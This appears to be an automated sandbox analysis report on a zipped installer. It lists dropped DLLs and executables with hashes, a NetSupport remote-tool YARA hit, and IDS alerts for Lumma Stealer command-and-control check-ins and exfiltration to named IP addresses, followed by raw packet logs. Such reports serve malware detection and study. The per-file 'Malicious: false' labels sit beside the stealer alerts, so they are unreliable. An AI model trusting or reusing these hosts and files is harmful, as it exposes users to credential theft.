SHA-512:	9DC6120E77B9B2AB364B1566F9F8104DB72574EAB4FF832D87B81E64EC16848D835C92A6E2484428C675A45B964FDB410EA28E4EB5D672603F5019236F770DB8
Malicious:	false
Preview:	..v...j...^.........................................(...:...F...N...d...z....................................".......:...N...h...x.................................... ...4...P...b...t.........................n..................>...T...p....................................(...@...P...^...t................................&...B...`............................. ...8...J...\...r..................................."......@...N...Z...n............................V...J...:..............................................................<...V...l...x...........................................(...2...D...V...f...x....................................... ...2...D...^...x..................x...^...H...2....... ...........................................'...........%...).......................................M...&...........................................h...R...>...(....................................... ...6...F...V...h...v....................................,...:.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rrjmc0g.033.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e51w4ybi.400.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggrlqq30.kcr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbehmhmn.q3n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p44cedkh.ali.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sp5pcb3q.owi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1049.dll

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	264504
Entropy (8bit):	4.2616300266171105
Encrypted:	false
SSDEEP:	768:KNGdfE7k4pzco2V0lyurfRZBGb052Vqa9/QkHq6KT8W8LI1LWFznKM+psOKrjG5v:KNubVGu57nUQG0HZSBTjZGmDbKzu7Axc
MD5:	0AC98A4BFC717523E344010A42C2F4BA
SHA1:	7967769EE63B28FC8BEC14854A4A0A71BDA6B3F2
SHA-256:	68546336232AA2BE277711AFA7C1F08ECD5FCC92CC182F90459F0C61FB39507F
SHA-512:	8A5F4F19C24C24A43D9D18A8935613AD6A031B8F33D582767A2407665F1FF39A403DDAEECBF4F22A58759FCD53F81F4392192CA9FA784FF098A6C995509F9547
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5Q..q0..q0..q0..eO~.p0..q0..p0..eO..p0..Richq0..........PE..L......d...........!...$............................................................./....@.......................................... .. ...............8)...........................................................................................rdata..............................@..@.rsrc... .... ......................@..@.......d........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .. +...rsrc$01.... K.......rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1058.dll

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268600
Entropy (8bit):	4.285774017645798
Encrypted:	false
SSDEEP:	1536:yNbT+wDopP25xej01K1+KnohMEDdQPfYBRL37KCxr:gbiwo25xwKhTDd80Rp
MD5:	41C75E831A5571C3F72287794391A0E6
SHA1:	0FE7A9A3C905D0376001A5C46EDFC0000FA82BD4
SHA-256:	B3AD99AFDAEE3B9365E7A3FFCC44C2761E22A4F92DFF5E5EFDC52F6B08EA0105
SHA-512:	D3D03F3308DB1862522127300127839AA44828D29622DB20AEA71E6A80A51247654E380D7A0126361D85774137826FC345AE368335BB1EA9C1C8995721DAF432
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5Q..q0..q0..q0..eO~.p0..q0..p0..eO..p0..Richq0..........PE..L......d...........!...$............................................................9.....@.......................................... ..................8)...........................................................................................rdata..............................@..@.rsrc........ ......................@..@.......d........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .. +...rsrc$01.... K.......rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	391832
Entropy (8bit):	6.788660116314725
Encrypted:	false
SSDEEP:	6144:/0pwbUb486Yu0LIFZf4TktH4aY384az44lstAZPVJ4hPueU12jXvbJaS0T9XjJpX:8pwbUb48Ju0LIFZf4Tk2aY3FasNAZtJp
MD5:	405A7BCA024D33D7D6464129C1B58451
SHA1:	22B64E211D96D773C510AC82E7A73F8DEBF4E4CD
SHA-256:	092C3EC01883D3B4B131985B3971F7E2E523252B75F9C2470E0821505C4A3A83
SHA-512:	3C8D4CBF377A8BEB793C93B63D521CCD75167DEC02DA43BB91434CB6B0737CA2D61FA201F2825FD1A0CEAAE768BB53D78F737E7C412AAE83D3CDC748893F31E6
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...;..U...........!......................................................................@.............................o...T...x....0..8....................@..`E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............\|..............@....rsrc...8....0......................@..@.reloc..&F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1084064
Entropy (8bit):	7.972549945523473
Encrypted:	false
SSDEEP:	24576:XxV7sidAl5JCm0LJuKEol0d6jLc2WCZhk7ztdZ67eplkbyM5Kd0I4/tEww3Fo:hRdA575KFj9Dhk7l3knk6IkY1o
MD5:	911D5567537C6BB8413884309387BB54
SHA1:	4FB952A1E2AAC681BEE9A456F6AD13E55ADC9522
SHA-256:	24D8C5EF81F9C9A17EABB906829B89CF8680C49AF58ABF4BA3E743302C03C378
SHA-512:	9BDDDA1BAF1FAFC7114FEFFD48B5919C0432E8C36987E2FC40143F88B1E9A302BFA639F17200382E6BF9B525225AA84B4D9D19A59F34AEB51752BAE6DF4E68F0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.......................................@.................................@........................e...$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\installer_1.05_36.4\opengl32sw.dll

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20923392
Entropy (8bit):	6.255903817217008
Encrypted:	false
SSDEEP:	393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
MD5:	7DBC97BFEE0C7AC89DA8D0C770C977B6
SHA1:	A064C8D8967AAA4ADA29BD9FEFBE40405360412C
SHA-256:	963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
SHA-512:	286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........\|.-.....\|.+....\|..<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....\|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

C:\Users\user\Desktop\installer_1.05_36.4\opengl64.dll

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18578896
Entropy (8bit):	6.451339218330448
Encrypted:	false
SSDEEP:	393216:PXhbUNnoBP98OQ//aXUszfTBHCOUZ2UenCDkOH2:PXhNB4nlW
MD5:	0A84667145E7EFEF026C888D4B768126
SHA1:	27673E1BD7C55BBA6EAA37620D3B3820CE45D46A
SHA-256:	DD575F3C64382193610815909BD2C52490244ECBBB9BBA6EEF5FE4F0BB43BB4D
SHA-512:	3E964C996ED358787C4DFDB965A00B38B4118C804AE1BF8D32AEB7D936584E72C188E3FA0D27D1C2FFD3BE13DCA8045B08B28B15070812C195D82D1BF23A2604
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hX2.,9\.,9\.,9\.%A.49\.wQY.-9\.....+9\..TX.&9\..T_.'9\..T].9\.wQX.)9\.wQZ.(9\..TY..9\.CO.-9\..k..(9\.wQ]..9\..PY.e9\.C]Z.-9\.@QX.9\.C]]."9\..gX.\9\..PX..;\.CO../9\.,9].T:\..gY.t8\..PY.'9\..PY.)9\.,9\.49\..WY.k9\..W\.-9\..W..-9\.,9.-9\..W^.-9\.Rich,9\.................PE..d...K..d.........."...........r......S.........@..........................................`.................................................<...p....P,.xh....#.,....D...9....,.$... '..T...................x'..(...0...................@...L...@....................text............................... ..`.uedbg..0........................... ..`.rdata....=.......=.................@..@.data.....)..@......................@....pdata..,.....#.....................@..@_RDATA...#... ,..$..................@..@.rsrc...xh...P,..j...&..............@..@.reloc..$.....,.....................@..B................

C:\Users\user\Desktop\installer_1.05_36.4\vcruntime140.dll

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	97160
Entropy (8bit):	6.422776154074499
Encrypted:	false
SSDEEP:	1536:yDHLG4SsAzAvadZw+1Hcx8uIYNUzUnHg4becbK/zJrCT:yDrfZ+jPYNznHg4becbK/Fr
MD5:	11D9AC94E8CB17BD23DEA89F8E757F18
SHA1:	D4FB80A512486821AD320C4FD67ABCAE63005158
SHA-256:	E1D6F78A72836EA120BD27A33AE89CBDC3F3CA7D9D0231AAA3AAC91996D2FA4E
SHA-512:	AA6AFD6BEA27F554E3646152D8C4F96F7BCAAA4933F8B7C04346E410F93F23CFA6D29362FD5D51CCBB8B6223E094CD89E351F072AD0517553703F5BF9DE28778
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d....(.`.........." .........`......p.....................................................`A.........................................B..4....J...............p..X....X...#..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

Static File Info

General

File type:	Zip archive data, at least v1.0 to extract, compression method=store
Entropy (8bit):	7.999973803757132
TrID:	ZIP compressed archive (8000/1) 100.00%
File name:	installer_1.05_36.4.zip
File size:	18'790'457 bytes
MD5:	fa2d5db52457d89d27b5d216bca32d78
SHA1:	a34f683167ad199013782d71e3071469e47e484b
SHA256:	9e8632f63da4af51c0b1754a0dd605df455e46aa099da11616e74938c39cdad5
SHA512:	3d0206d82528eb29c1171a869921863f88b20c26b72a78d61257943e76dc7e91b17adaaca9c14bdf92351b3531d562cef5ba93a1f272282c35bf479daa570946
SSDEEP:	393216:dVuSkk5tGLE+jM/C4HbWbD4zgiQutmx6YDjN1fxRR:dXN+AK47kD0IsQvPxn
TLSH:	C01733D5F5F3BE9E192D9A00FAA29080687BDCFB15C1B1D05DA53E222AD25529F9CCC0
File Content Preview:	PK........mg.Yj....E...E......installer_1.05_36.4.rarRar!......\E!.....-..&3`R'HH..2..DV..^aF.\.y.g>6..twLM.s.@UG..n.<.J.IrC....r.g..=.s.].&.......n.].s]..ZQ.'.S......L..M.D..7,.#...dQp..:b....K.Z...Ph........lV..`.I.f.q}........B...WCD\|q/z.....l...0.a...

File Icon


Icon Hash:	1c1c1e4e4ececedc

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T18:26:15.238752+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49708	172.67.166.49	443	TCP
2024-12-26T18:26:16.259072+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.16	49708	172.67.166.49	443	TCP
2024-12-26T18:26:16.259072+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.16	49708	172.67.166.49	443	TCP
2024-12-26T18:26:17.574360+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49709	172.67.166.49	443	TCP
2024-12-26T18:26:18.350202+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.16	49709	172.67.166.49	443	TCP
2024-12-26T18:26:18.350202+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.16	49709	172.67.166.49	443	TCP
2024-12-26T18:26:20.168775+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49710	172.67.166.49	443	TCP
2024-12-26T18:26:22.623747+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49711	172.67.166.49	443	TCP
2024-12-26T18:26:25.098426+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49712	172.67.166.49	443	TCP
2024-12-26T18:26:27.450829+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49713	172.67.166.49	443	TCP
2024-12-26T18:26:28.215871+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.16	49713	172.67.166.49	443	TCP
2024-12-26T18:26:29.931478+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49714	172.67.166.49	443	TCP
2024-12-26T18:26:32.092068+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49715	172.67.166.49	443	TCP
2024-12-26T18:26:34.310326+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49716	172.67.166.49	443	TCP
2024-12-26T18:26:36.436579+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49717	172.67.166.49	443	TCP
2024-12-26T18:26:37.202088+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.16	49717	172.67.166.49	443	TCP
2024-12-26T18:26:39.389022+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49718	185.161.251.21	443	TCP
2024-12-26T18:26:41.577184+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49719	172.67.214.186	443	TCP
2024-12-26T18:26:42.505942+0100	2008438	ET MALWARE Possible Windows executable sent when remote host claims to send a Text File	1	172.67.214.186	443	192.168.2.16	49719	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 18:26:13.926237106 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:13.926275969 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:13.926377058 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:13.927520990 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:13.927532911 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:15.238668919 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:15.238751888 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:15.240312099 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:15.240320921 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:15.240552902 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:15.286106110 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:15.286123991 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:15.286189079 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:16.259085894 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:16.259176016 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:16.259227037 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:16.260075092 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:16.260088921 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:16.260099888 CET	49708	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:16.260104895 CET	443	49708	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:16.264740944 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:16.264780998 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:16.264847040 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:16.265105963 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:16.265116930 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:17.574259043 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:17.574359894 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:17.575531960 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:17.575537920 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:17.575758934 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:17.576958895 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:17.576986074 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:17.577024937 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.350253105 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.350313902 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.350348949 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.350368977 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.350380898 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.350419998 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.350424051 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.353842020 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.353887081 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.353892088 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.362150908 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.362199068 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.362204075 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.405615091 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.405622005 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.452599049 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.469814062 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.516602993 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.516608953 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.560754061 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.560803890 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.560808897 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.564371109 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.564414978 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.564419985 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.571939945 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.571994066 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.572057962 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.572072983 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.572081089 CET	49709	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.572091103 CET	443	49709	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.863379002 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.863419056 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:18.863514900 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.863804102 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:18.863816023 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:20.168643951 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:20.168775082 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:20.169984102 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:20.169994116 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:20.170222044 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:20.171372890 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:20.171566963 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:20.171597004 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:21.111255884 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:21.111375093 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:21.111443996 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:21.111557961 CET	49710	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:21.111574888 CET	443	49710	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:21.317677975 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:21.317743063 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:21.317847967 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:21.318133116 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:21.318144083 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:22.623627901 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:22.623747110 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:22.625272036 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:22.625281096 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:22.625574112 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:22.626835108 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:22.626955986 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:22.626981974 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:22.627060890 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:22.667337894 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:23.535689116 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:23.535773993 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:23.535832882 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:23.535970926 CET	49711	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:23.535984039 CET	443	49711	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:23.790817976 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:23.790855885 CET	443	49712	172.67.166.49	192.168.2.16
